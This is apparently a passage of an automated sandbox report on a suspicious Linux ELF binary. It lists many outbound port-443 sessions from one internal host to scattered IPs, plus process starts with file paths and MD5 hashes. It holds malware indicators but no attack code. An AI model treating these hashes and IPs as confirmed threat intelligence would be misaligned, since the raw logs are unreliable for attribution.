                                                      21304192.168.2.1443120143.190.199.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21305192.168.2.143302427.195.226.105443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21306192.168.2.1449112147.0.109.69443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21307192.168.2.1432788122.202.204.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21308192.168.2.1440272135.75.25.53443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21309192.168.2.14543964.37.135.101443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21310192.168.2.1454570136.222.39.31443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21311192.168.2.144343690.29.89.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21312192.168.2.1454542114.85.30.242443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21313192.168.2.143786090.11.254.25443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21314192.168.2.1444550125.171.50.112443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21315192.168.2.1460434160.46.151.125443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21316192.168.2.1445644101.53.122.128443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21317192.168.2.143680661.62.206.236443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21318192.168.2.1436938130.179.112.167443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21319192.168.2.1434162196.221.0.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21320192.168.2.145660849.36.66.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21321192.168.2.1449404150.144.18.203443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21322192.168.2.1434836112.51.182.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21323192.168.2.145221474.216.231.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21324192.168.2.143441273.54.36.212443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21325192.168.2.1445768181.73.105.198443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21326192.168.2.143525439.17.110.138443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21327192.168.2.1454848117.182.7.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21328192.168.2.1453792195.30.212.79443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21329192.168.2.1435828151.114.218.64443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21330192.168.2.1438228183.123.90.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21331192.168.2.145038868.31.115.62443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21332192.168.2.1447548121.55.236.234443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21333192.168.2.1453150162.152.9.142443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21334192.168.2.1458654147.238.247.93443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21335192.168.2.145539871.176.69.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21336192.168.2.144104025.196.214.172443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21337192.168.2.144340619.21.44.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21338192.168.2.1432916153.130.173.177443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21339192.168.2.146035881.145.114.239443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21340192.168.2.1456222115.239.128.213443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21341192.168.2.143415869.159.110.50443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21342192.168.2.1458598212.253.192.133443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21343192.168.2.144544290.146.16.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21344192.168.2.143603637.187.193.78443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21345192.168.2.143366892.251.207.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21346192.168.2.143476827.206.21.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21347192.168.2.1456322175.89.87.34443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21348192.168.2.1450400108.181.156.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21349192.168.2.1435314129.181.247.140443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21350192.168.2.1451700222.28.125.6443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21351192.168.2.14470608.191.107.85443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21352192.168.2.145761052.86.238.216443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21353192.168.2.143756462.127.6.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21354192.168.2.1444660191.161.98.148443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21355192.168.2.144297831.132.186.63443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21356192.168.2.1443942148.19.231.95443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21357192.168.2.1457266150.225.211.210443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21358192.168.2.1434592213.199.127.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21359192.168.2.1454934165.195.137.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21360192.168.2.1440554139.140.179.217443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21361192.168.2.1459976200.69.78.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21362192.168.2.1455710211.241.120.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21363192.168.2.143416478.210.71.201443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21364192.168.2.143380862.13.125.56443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21365192.168.2.1454630116.21.141.192443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21366192.168.2.1441828181.99.53.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21367192.168.2.1449386133.51.239.44443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21368192.168.2.1448252189.41.161.200443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21369192.168.2.1437164123.81.34.76443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21370192.168.2.1453078183.125.4.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21371192.168.2.1452000140.176.139.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21372192.168.2.1455220103.242.31.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21373192.168.2.1445456206.59.154.158443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21374192.168.2.1434824199.137.204.35443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21375192.168.2.1437454131.49.232.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21376192.168.2.1440210202.38.113.170443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21377192.168.2.1453400207.137.228.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21378192.168.2.144483879.126.136.165443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21379192.168.2.145907068.159.137.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21380192.168.2.144173636.25.36.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21381192.168.2.145915664.194.199.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21382192.168.2.1458090199.65.99.118443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21383192.168.2.1449724188.126.144.48443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21384192.168.2.1449858133.247.85.191443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21385192.168.2.1441992141.145.243.207443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21386192.168.2.1444264187.155.68.174443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21387192.168.2.144781499.25.151.42443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21388192.168.2.1447548206.8.94.230443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21389192.168.2.1439152144.158.232.223443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21390192.168.2.1441340110.159.220.160443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21391192.168.2.1440002148.47.21.185443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21392192.168.2.145904032.175.61.181443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21393192.168.2.1436370204.103.191.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21394192.168.2.1439640220.31.28.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21395192.168.2.143638058.233.84.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21396192.168.2.1459994155.93.24.20443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21397192.168.2.1456324177.136.30.153443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21398192.168.2.143497838.112.185.182443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21399192.168.2.1436990223.173.73.178443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21400192.168.2.1458876170.20.120.171443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21401192.168.2.1433772130.208.1.199443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21402192.168.2.1454644119.63.20.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21403192.168.2.1456122118.218.169.29443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21404192.168.2.1442304195.16.32.3443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21405192.168.2.1449698123.112.4.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21406192.168.2.1448014132.144.210.194443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21407192.168.2.1437640183.232.53.87443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21408192.168.2.144290251.140.182.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21409192.168.2.143399842.243.118.7443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21410192.168.2.1446212184.240.149.124443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21411192.168.2.145253674.116.175.111443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21412192.168.2.143746842.207.110.144443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21413192.168.2.1456056135.34.145.5443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21414192.168.2.1439698184.46.13.28443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21415192.168.2.1436372174.62.152.27443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21416192.168.2.1438960138.19.47.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21417192.168.2.1452810213.123.142.60443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21418192.168.2.145833067.212.248.221443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21419192.168.2.144703049.171.87.82443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21420192.168.2.1435192116.129.101.108443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21421192.168.2.143344440.253.91.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21422192.168.2.1460068159.91.19.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21423192.168.2.1456064124.5.25.81443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21424192.168.2.1460464209.155.49.37443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21425192.168.2.145992262.79.255.74443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21426192.168.2.1437602204.86.198.251443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21427192.168.2.143573262.122.131.68443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21428192.168.2.1458266156.139.75.86443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21429192.168.2.1450874164.201.39.130443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21430192.168.2.1436404212.59.90.231443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21431192.168.2.143808893.33.65.115443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21432192.168.2.14366704.122.53.77443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21433192.168.2.144636894.83.87.243443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21434192.168.2.1439654128.72.112.214443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21435192.168.2.145460266.190.69.54443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21436192.168.2.1439008213.220.220.244443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21437192.168.2.1436504176.174.213.73443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21438192.168.2.1432782139.40.97.65443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21439192.168.2.1448630203.78.194.151443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21440192.168.2.1438860167.117.40.175443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21441192.168.2.1453478199.208.109.232443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21442192.168.2.1436528111.167.22.240443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21443192.168.2.1450726207.229.117.145443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21444192.168.2.14484148.27.154.57443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21445192.168.2.145600440.226.119.92443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21446192.168.2.1457048132.103.6.146443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21447192.168.2.1436460190.239.117.228443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21448192.168.2.1459368171.28.170.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21449192.168.2.143910820.114.114.225443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21450192.168.2.1444692180.74.206.202443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21451192.168.2.1458974203.181.104.39443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21452192.168.2.1448722172.88.78.30443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21453192.168.2.1460844183.241.144.155443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21454192.168.2.144906839.40.106.116443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21455192.168.2.145731670.108.199.187443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21456192.168.2.1460628121.11.209.45443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21457192.168.2.143419080.200.148.173443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21458192.168.2.1444944158.95.5.15443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21459192.168.2.144403276.67.227.154443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21460192.168.2.1437018187.63.195.19443
                                                      TimestampBytes transferredDirectionData


                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                      21461192.168.2.1446432108.73.90.40443
                                                      TimestampBytes transferredDirectionData


                                                      System Behavior

                                                      Start time (UTC):05:34:58
                                                      Start date (UTC):02/02/2024
                                                      Path:/tmp/3wN5NfZaD8.elf
                                                      Arguments:/tmp/3wN5NfZaD8.elf
                                                      File size:4463432 bytes
                                                      MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                      Start time (UTC):05:34:58
                                                      Start date (UTC):02/02/2024
                                                      Path:/tmp/3wN5NfZaD8.elf
                                                      Arguments:-
                                                      File size:4463432 bytes
                                                      MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                      Start time (UTC):05:34:58
                                                      Start date (UTC):02/02/2024
                                                      Path:/tmp/3wN5NfZaD8.elf
                                                      Arguments:-
                                                      File size:4463432 bytes
                                                      MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                      Start time (UTC):05:34:58
                                                      Start date (UTC):02/02/2024
                                                      Path:/tmp/3wN5NfZaD8.elf
                                                      Arguments:-
                                                      File size:4463432 bytes
                                                      MD5 hash:cd177594338c77b895ae27c33f8f86cc

                                                      Start time (UTC):05:34:58
                                                      Start date (UTC):02/02/2024
                                                      Path:/tmp/3wN5NfZaD8.elf
                                                      Arguments:-
                                                      File size:4463432 bytes
                                                      MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                                      Start time (UTC):05:34:58
                                                      Start date (UTC):02/02/2024
                                                      Path:/tmp/3wN5NfZaD8.elf
                                                      Arguments:-
                                                      File size:4463432 bytes
                                                      MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                                      Start time (UTC):05:34:58
                                                      Start date (UTC):02/02/2024
                                                      Path:/tmp/3wN5NfZaD8.elf
                                                      Arguments:-
                                                      File size:4463432 bytes
                                                      MD5 hash:cd177594338c77b895ae27c33f8f86cc
                                                      Start time (UTC):05:35:00
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/libexec/gnome-session-binary
                                                      Arguments:-
                                                      File size:334664 bytes
                                                      MD5 hash:d9b90be4f7db60cb3c2d3da6a1d31bfb

                                                      Start time (UTC):05:35:00
                                                      Start date (UTC):02/02/2024
                                                      Path:/bin/sh
                                                      Arguments:/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-print-notifications
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):05:35:00
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/libexec/gsd-print-notifications
                                                      Arguments:/usr/libexec/gsd-print-notifications
                                                      File size:51840 bytes
                                                      MD5 hash:71539698aa691718cee775d6b9450ae2

                                                      Start time (UTC):05:35:01
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/libexec/gsd-print-notifications
                                                      Arguments:-
                                                      File size:51840 bytes
                                                      MD5 hash:71539698aa691718cee775d6b9450ae2

                                                      Start time (UTC):05:35:01
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/libexec/gsd-print-notifications
                                                      Arguments:-
                                                      File size:51840 bytes
                                                      MD5 hash:71539698aa691718cee775d6b9450ae2

                                                      Start time (UTC):05:35:01
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/libexec/gsd-printer
                                                      Arguments:/usr/libexec/gsd-printer
                                                      File size:31120 bytes
                                                      MD5 hash:7995828cf98c315fd55f2ffb3b22384d

                                                      Start time (UTC):05:35:02
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/sbin/gdm3
                                                      Arguments:-
                                                      File size:453296 bytes
                                                      MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                      Start time (UTC):05:35:02
                                                      Start date (UTC):02/02/2024
                                                      Path:/etc/gdm3/PrimeOff/Default
                                                      Arguments:/etc/gdm3/PrimeOff/Default
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):05:35:02
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/sbin/gdm3
                                                      Arguments:-
                                                      File size:453296 bytes
                                                      MD5 hash:2492e2d8d34f9377e3e530a61a15674f

                                                      Start time (UTC):05:35:02
                                                      Start date (UTC):02/02/2024
                                                      Path:/etc/gdm3/PrimeOff/Default
                                                      Arguments:/etc/gdm3/PrimeOff/Default
                                                      File size:129816 bytes
                                                      MD5 hash:1e6b1c887c59a315edb7eb9a315fc84c

                                                      Start time (UTC):05:35:12
                                                      Start date (UTC):02/02/2024
                                                      Path:/usr/lib/systemd/systemd
                                                      Arguments:-
                                                      File size:1620224 bytes
                                                      MD5 hash:9b2bec7092a40488108543f9334aab75

                                                      Start time (UTC):05:35:12
                                                      Start date (UTC):02/02/2024
                                                      Path:/lib/systemd/systemd-user-runtime-dir
                                                      Arguments:/lib/systemd/systemd-user-runtime-dir stop 127
                                                      File size:22672 bytes
                                                      MD5 hash:d55f4b0847f88131dbcfb07435178e54